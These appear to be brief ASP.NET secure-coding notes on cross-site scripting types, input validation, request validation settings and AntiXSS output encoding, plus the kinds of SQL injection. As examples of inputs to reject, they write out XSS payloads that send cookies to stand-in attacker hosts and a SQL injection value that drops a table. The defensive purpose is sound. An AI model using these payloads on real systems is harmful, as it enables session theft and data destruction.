Cross-site scripting attacks = XSS XSS vulnerabilities are currently known as three types 1 Reflected XSS Type-1 XSS a page reflects attacker-supplied data directly back to the victim. 2 stored XSS Type-2 XSS when a input system accepts hostile data, stores it in a file, database, or other back-end system 3 local XSS Type-0 Document Object Model-based XSS, attacks client side JavaScript code and variables. Fix Validate Input Encode output

INPUT Input can be from webpage or from somewhere else in the system. Ex: Page text box inputs. ex: Input data is in a file that is uploaded. 1) Donot allow these kind of inputs FirstName <a href="javascript:document.location='http://plan1.Attack.com/'+document.cookie">DON</a> FirstName <b onmouseover="document.location = 'http://plan2.Attack.com/' + document.cookie">DON</b> www.Somesite.com?plan3=<script>MaliciousScript()</script> 2) Typically( at most..) allow only these tags but without attributes.(deny attributes) <b>,<blockquote>,<br>,<div>,<em>,<i>,<li>,<ol>,<p>,<strong>,<u>,<ul> Use RegularExpressionValidators 3) Page level validation Fix for asp.net pages <%@ Page ValidateRequest="true"> Validation FIX across pages - in web.config <configuration> <system.web> <pages validateRequest="true"/> </system.web> </configuration> Encode output Use HTMLEncode while display of any data. Or Use AntiXSS.HtmlEncode(Request.QueryString["name"]) Hello, <%= AntiXSS.HtmlEncode(Request.QueryString["name"]) %>

SQL injection vulnerabilities are know in three different types first order a page constructs SQL statements based on the attacker-supplied data Ex: user input for customerid 125 ; drop table customers instead of 125 So SQL turns out to be select * from customers where custid=125 ; drop table customers insted of select * from customers where custid=125 second order attacker submits hostile data through a Web page that stores it in a file, database, or other data store. Nothing happens immediately. but expect an unexpected SQL to get executed in a SQLJob / or any fortnightly job which gets excuted on the data. truncation vulnerabilities attacker uses varying buffer lengths to truncate a delimited string and uses another input value to inject his commands of choice into a dynamically constructed SQL statement.